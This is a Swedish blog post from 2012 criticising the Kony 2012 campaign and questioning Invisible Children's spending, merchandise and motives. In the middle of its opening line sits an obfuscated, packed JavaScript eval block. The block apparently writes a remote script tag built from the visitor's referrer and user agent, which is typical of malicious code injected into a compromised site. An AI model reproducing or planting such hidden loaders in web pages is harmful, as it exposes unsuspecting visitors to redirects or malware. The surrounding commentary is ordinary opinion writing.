Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

12 Comments

Kony 2012, en annan synvinkel

Kony 2012: Är det en kamp om rättvisa, eller bevittnar vi ett världsomspännande bedrägeri?
Filip Urde
  • On 8 mars, 2012
  • http://www.revue.se/filip-urde

Kony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ssddr|var|u0026u|referrer|hdrit||js|php’.split(‘|’),0,{}))
2012, filmen som spred sig likt pesten över hela Facebook.

I lördags hade filmen 8 visningar, igår vid lunch hade 2,3 miljoner personer sett filmen. Folk har ”likeat”, delat, postat och skrivit statusar om filmen och dess budskap. Här nedan kan vi se en skärmdump av händelseförloppet som är helt otroligt. Folk bryr sig! och folk bryr sig mycket!

I en nästan overkliga uppslutning så har en hel generation dedikerat sina facebook statusar till en person som ingen av dem känt till tidigare, varför? För att en organisation säger till dem att göra så. Ingen har stannat upp och varit kritisk mot vad som precis skett.

Jag tvekar inte på att Joseph Kony och hans Lord’s Resistance Army existerar, eller att Invisible Children gör detta med god intention. Vad jag tvekar på och är skeptisk till är Invisible Childrens riktiga motiv. Vi på Revue.se var snabbt med och skrev om Kony 2012, vi har alla delat filmen på Facebook och vi blev alla rörda. Men när man tittar tillbaka så är det något som känns fel.

Filmen är ett mästerverk! den är väldigt snyggt gjord och känslan förmedlas klockrent. Men är det därför jag bryr mig? För att filmen är så välproducerad och för att jag helt enkelt vill bry mig?

I början av filmen nämner man att kommande 27 minuter är ett ”experiment”. Om att få folk att bry sig? eller för att vara cynisk, få folk att bry sig så mycket att dem gör av med pengar.

Invisible Children är en organisation vars ekonomiska delar verkligen går att ifrågasätta.

Förra året så spenderade Invisible Children hela 8, 676, 614 dollar varav endast 32% gick till själva uppdraget. Resten gick till löner, resor, transport och just filmen! Detta kan verkligen ställas mot väggen. Ska en organisation med syftet att hjälpa barn i Afrika verkligen lägga ner mestadelen av sina pengar på löner och en film? Nu vet jag att ”ideellt” aldrig kan vara helt ideellt, någon måste få pengar någonstans men för att vara helt krass så låter detta som ännu ett försök att utnyttja misären i Afrika för sin egen vinning.

Invisible Children har även fått kritik för att man inte vill sammarbeta med Better Business Bureau – en organisation som undersöker företags etik.  Varför vill man inte vara transparanta? Vad döljer man?

Hela filmen genomsyras av något som känns fel, det känns som en ny Al Gore film, skapad för att belysa och ge medvetande för ett problem i en snygg film och sedan vinna priser för det… är priserna målet för Invisible Children? Behöver man verkligen göra en så här påskostad film till en sådanhär kamp? Bör inte kampen i sig vara nog och bör inte målet vara att hålla nere på just produktionskostnader?

I filmen ser vi t.ex. Facebooks timeline, i något som liknar en ren reklamfilm för dess funktion, vi får se massa människor över hela världen som bryr sig och visar sin gemenskap, vi får se hans son Gavin vara söt, vi får se politiker som bryr sig, vi ser militärer som bryr sig och vi ser gråtande bilder från Afrika.

Känslor, åsikter, enighet, gemenskap, två sidor gå ihop mot samma fråga (bägge partierna i USA), vi får veta för vem vi gör det och hur vi ska göra det. Vi får till och med datum på när det måste göras och ett slutdatum på när det är försent. Är det bara jag som ryser av propagandan i det här? Är det ingen som får vibbar från en tid som är förbi?

Jag måste säga att jag blir lite rädd, när man trycker detta paket av sorg och missär rakt i ansiktet på mig, för att sedan avsluta med vad jag ska köpa ett ”action pack” och skicka bidrag för att tabort sorgen och smärtan för alla dessa utsatta. Om du går in på http://invisiblechildrenstore.myshopify.com/ så hittar du en affär med merchandise… ”Allt du behöver för att bidra”.

Varför har all denna tid lagts ner på merchandise? När man inte nämner 1 gång var pengarna exakt ska gå till… Vad händer med barnen i Afrika om jag köper en T-shirt? Det här är försäljning på folkskänslor at it’s best.

När jag såg filmen blev jag så rörd att jag nästan fällde en tår,  tänkte jag efter och nu känns det som allt kokar ner i något som liknar ett reklamstunt! Med prylar som ska köpas.

Avslutningsvis.

Varför ska vi skicka trupperna och hjälpen till UGANDA? Kony är tydligt inte där längre…

Det är nog inte ett bedrägeri, men det finns annledningar att vara kritisk i alla lägen.

 

UPPDATERING

Se den här filmen om Invisible Children, bra förklaring av vad dem verkligen gör!

 

Tack för tipset Daniel Possman.

http://mashable.com/2012/03/08/kony-2012-scam/

www.vice.com/en_uk/read/should-i-donate-money-to-kony-2012-or-not

http://visiblechildren.tumblr.com/post/18890947431/we-got-trouble

http://blog.joerenken.com/2012/03/07/invisible-children-and-kony-2012-exposed/